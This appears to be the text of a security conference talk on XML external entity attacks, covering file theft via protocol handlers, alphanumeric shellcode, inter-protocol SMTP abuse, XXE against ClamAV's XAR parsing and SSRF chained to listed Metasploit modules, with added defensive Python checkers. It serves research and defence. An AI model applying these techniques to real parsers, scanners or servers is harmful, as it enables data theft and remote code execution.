<?xml version="1.0"?>
<!DOCTYPE presentation [
<!ENTITY HacktivityLogo SYSTEM "http://hacktivity.com/logo.png"> ]>
<presentation>
<logos>&HacktivityLogo; </logos>
<title>
eXploitable Markup Language
</title>
<speakers>
<speaker Name="Rajtmár Ákos">
<email>akos.rajtmar@praudit.hu</email>
</speaker>
<speaker Name="Szakály Tamás">
<email>tamas.szakaly@praudit.hu</email>
<twitter>@sghctoma</twitter>
</speaker>
</speakers>
</presentation>
Possible Hacktivity topics
How secure are today’s games?
Possible vulns in the EventLog subsystem of recent Windows systems.
The security of smart houses.
Well known XML attacks
XSLT-related
XInclude attacks
Entity-based attacks
• Billion laughs
• XXE
Everybody should read “XML Schema, DTD, and Entity Attacks” by VSR
DON’Ts
Lots of XML-related web application attacks.
But the web is not the whole world. (not yet, anyway :) )
Won’t show any new XML vulnerabilities.
DOs
Show exciting ways to exploit
Deal with the client side
Deal with XML-derivatives, and files with embedded XML parts
There are tons of these.
Often people don’t even realize they are dealing with XML
Some examples: X3D, CML, BeerXML, GPX, OpenDocument, EPUB, you name it.
XML entities
What are “entities” in XML-world?
OK, what are “external entities”?
http://www.w3.org/TR/2006/REC-xml11-20060816/#sec-entity-decl
XXE Intro
Most basic XXE: include resources
App has to display something from the XML
Interesting protocol handlers
• jar:// extract a file from a given .jar
• file:// directory listing
• php:// with filters (base64-encode a file)
Parameter entities
Special type of entity
Using % instead of &
More flexible
Declaration of external DTD
Cannot be used in the XML body
XML syntax is not a must
DTD conformity
Non-XML-conformant content
combine.dtd:
<![CDATA[ ]]>
Sending local file content
External parameter entity
Different protocol handlers
FTP, HTTP, FILE
Differences in implementation
Out-of-Band
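The two entity flavours above (general external entities as in the title slide, and parameter entities that pull in an external DTD) are both declared inside a DOCTYPE, which is what a consumer of untrusted XML should refuse before any parser sees the document. The following is an added example, not code from the talk: a pre-parse check that reports the DOCTYPE and every external entity with its kind and URI scheme, then parses only DTD-free input with Python's standard-library ElementTree. The title-slide document is the talk's own; the parameter-entity document and its host name `dtd-host.example` are constructed placeholders. The check re-encodes UTF-16 input first, because a byte-level pattern alone is defeated by a document that simply switches encoding.

```python
import codecs
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# A DOCTYPE anywhere in the input (the internal subset is where entities live).
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)

# External entity declarations, general (<!ENTITY name ...>) or parameter
# (<!ENTITY % name ...>), with either a SYSTEM or a PUBLIC identifier.
# Groups: 1 = "%" marker, 2 = name, 3 = SYSTEM URI, 4 = PUBLIC URI.
ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(%\s*)?([^\s%>]+)\s+"
    rb"(?:SYSTEM\s+[\"']([^\"']*)[\"']"
    rb"|PUBLIC\s+[\"'][^\"']*[\"']\s+[\"']([^\"']*)[\"'])",
    re.IGNORECASE,
)


class UnsafeXML(ValueError):
    """Raised when an untrusted document carries DTD machinery."""


def _normalize(doc: bytes) -> bytes:
    """Re-encode UTF-16 input as UTF-8 so the byte patterns above cannot be
    dodged by switching the document encoding; anything else passes through."""
    if doc.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return doc.decode("utf-16").encode("utf-8")
    return doc


def inspect_dtd(doc: bytes) -> dict:
    """Report whether the document has a DOCTYPE and list every external
    entity it declares, with its kind and the URI scheme it would fetch."""
    text = _normalize(doc)
    entities = []
    for m in ENTITY_RE.finditer(text):
        raw_uri = m.group(3) if m.group(3) is not None else m.group(4)
        uri = raw_uri.decode("utf-8", "replace")
        entities.append({
            "kind": "parameter" if m.group(1) else "general",
            "name": m.group(2).decode("utf-8", "replace"),
            "scheme": urlsplit(uri).scheme.lower(),
            "uri": uri,
        })
    return {"doctype": DOCTYPE_RE.search(text) is not None,
            "external_entities": entities}


def parse_untrusted(doc: bytes) -> ET.Element:
    """Refuse any DOCTYPE at all (the usual XXE mitigation), then parse with
    ElementTree, which does not fetch external entities on its own."""
    report = inspect_dtd(doc)
    if report["doctype"] or report["external_entities"]:
        detail = "; ".join(
            f"{e['kind']} entity {e['name']} -> {e['scheme'] or '?'}"
            for e in report["external_entities"]
        ) or "DOCTYPE present"
        raise UnsafeXML(f"rejected DTD in untrusted XML: {detail}")
    return ET.fromstring(doc)


# Constructed samples. The first is the talk's own title slide.
TITLE_SLIDE = b"""<?xml version="1.0"?>
<!DOCTYPE presentation [
<!ENTITY HacktivityLogo SYSTEM "http://hacktivity.com/logo.png"> ]>
<presentation><logos>&HacktivityLogo;</logos>
<title>eXploitable Markup Language</title></presentation>
"""

# Parameter entity that pulls in an external DTD; the host is a placeholder.
PARAM_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % ext SYSTEM "http://dtd-host.example/combine.dtd">
%ext;
]>
<data/>
"""

CLEAN_DOC = b"""<?xml version="1.0"?><presentation><title>no DTD</title></presentation>"""


if __name__ == "__main__":
    for label, doc in [("title slide", TITLE_SLIDE),
                       ("parameter entity", PARAM_DOC), ("clean", CLEAN_DOC)]:
        try:
            print(f"{label}: parsed <{parse_untrusted(doc).tag}>")
        except UnsafeXML as exc:
            print(f"{label}: {exc}")
```

Rejecting every DOCTYPE is deliberately blunter than only rejecting external entities: it also stops internal-entity expansion attacks (the "billion laughs" listed earlier) and needs no knowledge of which handlers the underlying parser honours. A comment containing the literal text `<!DOCTYPE` will be rejected too, which is the right trade-off for untrusted input.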
XXE meets inter-protocol exploitation
Requirements
Encapsulation
Error tolerance
Main difficulty: limited character set
Let’s check some XML parsers’ badchars
Internet Explorer
• only ASCII
• URL-encodes some characters (e.g. space -> %20)
• Cuts newlines
Visual Studio
• URL-encodes every non-alphanumeric character
Trigger BoF via XXE
http://exploit-db.com/exploits/31789
Alphanum shellcode
Restricted to alphanumeric characters
UTF-8 too!!
Metasploit Framework
Encoders: x86/alpha_mixed, x86/alpha_upper
Useful options: BufferRegister, AllowWin32SEH
The payload
qB8w
Need “jmp esp” with an ASCII-only address
0x77384271 in big endian is qB8w
Installed Pidgin
Jabber configured
accounts.xml
Request external DTD
Generating mailer payload
Sending malicious content
Authenticated as user
Inter protocol SMTPloitation
Garmin Training Center
+ Not bothering with \n (newlines pass through)
- Yet not able to evaluate &variables;
Possible implementation issue
Visual Studio 2012
+ Ability to evaluate &variables;
- A great fan of URL encoding
Permanent fail?
Slight possibility of using Garmin
I believe I saw it working
Finding another application that tolerates \n
Visual Studio can be "controlled"
Sending multiple files
Delivering more attacks
Not at all
XXE the AV!
Original idea: .docx vs. virus scanners
Grepped ClamAV’s source for “xml”
It uses libxml2 to open XAR archives
basically an archive format with compressed XML metadata
What other AVs know this format?
EICAR string:
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
XARed it and sent it to VirusTotal
Besides ClamAV, these can deal with XAR:
AVG
Ad-Aware
Avast
Avira
BitDefender
DrWeb
ESET-NOD32
Emsisoft
F-Secure
Gdata
Kaspersky
NANO-Antivirus
Qihoo-360
nProtect
MicroWorld-eScan
There Can Be Only One
AVs use XML parsers without knowledge of DTD
Except ClamAV
• Only recent versions >= 0.98.1
So let’s hack ClamAV!
XAR format
XAR hexdump
PoC
Python script to create XARs with custom XML
Simple XML with HTTP external entity:
Scanned it with clamscan...
... and it worked!
&Some haxx0r stuff;
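A scanner that understands XAR has to inflate the compressed table of contents and then read it as XML, which is the step at which a DTD in the TOC becomes a problem. The following is an added example, not the talk's script or ClamAV code: it packs a constructed TOC behind the 28-byte big-endian XAR header (magic, header size, version, compressed and uncompressed TOC length, checksum algorithm; no heap section follows, so it is a fixture, not a complete archive), then shows the scanner-side policy of inflating with a bound taken from the header, cross-checking the claimed length, and parsing the TOC only when it carries no DOCTYPE or ENTITY declaration. The host name `callback.example.invalid` in the second TOC is a placeholder.

```python
import re
import struct
import zlib
import xml.etree.ElementTree as ET

# The 28-byte big-endian XAR header: magic "xar!", header size, format
# version, compressed and uncompressed TOC length, checksum algorithm id.
XAR_MAGIC = b"xar!"
XAR_HEADER = ">4sHHQQI"
XAR_HEADER_SIZE = struct.calcsize(XAR_HEADER)  # 28
CKSUM_SHA1 = 1
MAX_TOC_BYTES = 16 * 1024 * 1024  # policy cap on the inflated TOC

# Any DTD machinery in a TOC is out of place and is treated as hostile.
DTD_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def build_xar(toc_xml: bytes) -> bytes:
    """Wrap a TOC in a XAR header (test fixture; no heap section follows)."""
    packed = zlib.compress(toc_xml)
    header = struct.pack(XAR_HEADER, XAR_MAGIC, XAR_HEADER_SIZE, 1,
                         len(packed), len(toc_xml), CKSUM_SHA1)
    return header + packed


def read_toc(blob: bytes) -> bytes:
    """Extract and inflate the TOC without trusting the header's lengths."""
    if len(blob) < XAR_HEADER_SIZE:
        raise ValueError("too short for a XAR header")
    magic, hsize, _version, clen, ulen, _alg = struct.unpack(
        XAR_HEADER, blob[:XAR_HEADER_SIZE])
    if magic != XAR_MAGIC:
        raise ValueError("not a XAR archive")
    if hsize < XAR_HEADER_SIZE or ulen > MAX_TOC_BYTES:
        raise ValueError("implausible header lengths")
    packed = blob[hsize:hsize + clen]
    if len(packed) != clen:
        raise ValueError("truncated TOC")
    # Bounded inflate: ask for at most ulen+1 bytes, so a TOC larger than the
    # header claims is detected instead of being expanded without limit.
    toc = zlib.decompressobj().decompress(packed, ulen + 1)
    if len(toc) != ulen:
        raise ValueError("TOC length does not match header")
    return toc


def scan_xar(blob: bytes) -> dict:
    """Scanner-side policy: inflate the TOC and parse it as XML only when it
    carries no DTD; otherwise report it and never hand it to the parser."""
    toc = read_toc(blob)
    has_dtd = DTD_RE.search(toc) is not None
    names = []
    if not has_dtd:
        root = ET.fromstring(toc)
        names = [n.text for n in root.iter("name")]
    return {"toc_bytes": len(toc), "has_dtd": has_dtd, "files": names}


# Constructed TOCs. The first mirrors the nesting a real TOC uses.
CLEAN_TOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<xar><toc>
  <file id="1"><name>README</name><type>file</type></file>
  <file id="2"><name>bin</name><type>directory</type>
    <file id="3"><name>tool</name><type>file</type></file>
  </file>
</toc></xar>"""

# The same idea with an HTTP external entity declared in front of the TOC;
# the host is a placeholder, not a real endpoint.
XXE_TOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xar [ <!ENTITY probe SYSTEM "http://callback.example.invalid/ping"> ]>
<xar><toc><file id="1"><name>&probe;</name></file></toc></xar>"""


if __name__ == "__main__":
    for label, toc in [("clean", CLEAN_TOC), ("xxe", XXE_TOC)]:
        print(label, scan_xar(build_xar(toc)))
```

Two checks matter beyond the DTD pattern itself: the inflate is bounded by the header's uncompressed length and then compared against it, so a crafted header cannot make the scanner allocate freely, and the TOC is only parsed after the policy check, so the parser's own DTD handling never becomes the last line of defence.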
libxml2 limitation: very strict URI checking
for example, no newlines allowed
OOB attacks are very limited
only files without newlines can be stolen.
SSRF is our Super Mushroom
only GET requests
only HTTP
payload cannot contain non-ASCII chars
Finding suitable exploits
# keep only the modules whose source mentions none of 443, post, ssl
cat ~/msf_http.txt | while read -r line; do
  if ! grep -q -E -i "443|post|ssl" "$line"; then
    echo "$line"
  fi
done > ~/msf_http_nossl_nopost.txt
linux/http/esva_exec
linux/http/dreambox_openpli_shell
linux/http/fritzbox_echo_exec
linux/http/symantec_web_gateway_lfi
linux/http/symantec_web_gateway_pbcontrol
linux/http/ddwrt_cgibin_exec
multi/http/struts_code_exec
multi/http/vtiger_install_rce
multi/http/v0pcr3w_exec
multi/http/snortreport_exec
multi/http/spree_search_exec
multi/http/phptax_exec
multi/http/gitorious_graph
multi/http/familycms_less_exec
multi/http/gestioip_exec
multi/http/freenas_exec_raw
multi/http/ajaxplorer_checkinstall_exec
multi/http/spree_searchlogic_exec
multi/http/oracle_reports_rce
multi/http/mobilecartly_upload_exec
unix/http/freepbx_callmenum
unix/webapp/cacti_graphimage_exec
unix/webapp/awstats_configdir_exec
unix/webapp/barracuda_img_exec
unix/webapp/invision_pboard_unserialize_exec
unix/webapp/basilic_diff_exec
unix/webapp/awstats_migrate_exec
unix/webapp/google_proxystylesheet_exec
unix/webapp/base_qry_common
unix/webapp/tikiwiki_graph_formula_exec
unix/webapp/mambo_cache_lite
unix/webapp/awstatstotals_multisort
unix/webapp/openview_connectednodes_exec
unix/webapp/php_charts_exec
unix/webapp/php_vbulletin_template
unix/webapp/freepbx_config_exec
unix/webapp/twiki_search
unix/webapp/twiki_history
unix/webapp/mitel_awc_exec
unix/webapp/instantcms_exec
unix/webapp/redmine_scm_exec
windows/http/sap_configservlet_exec_noauth
Our choice for the demo
unix/webapp/freepbx_config_exec
Further research
Games that use XML for game saves, network communication
• Skyrim
• FlightGear
XML metadata
• RDF
Binary XML parsers
• CWXML
• OpenEXI
• EXIficient
• AgileDelta
• Windows EventLog format (since Vista)
Network Configuration Protocol (NETCONF)
XML databases
• IBM DB2
• Oracle
• MSSQL
THX

Editor's notes

  1. Java demo: demonstrating a directory listing. PHP web demo: stealing the source code in base64-encoded form.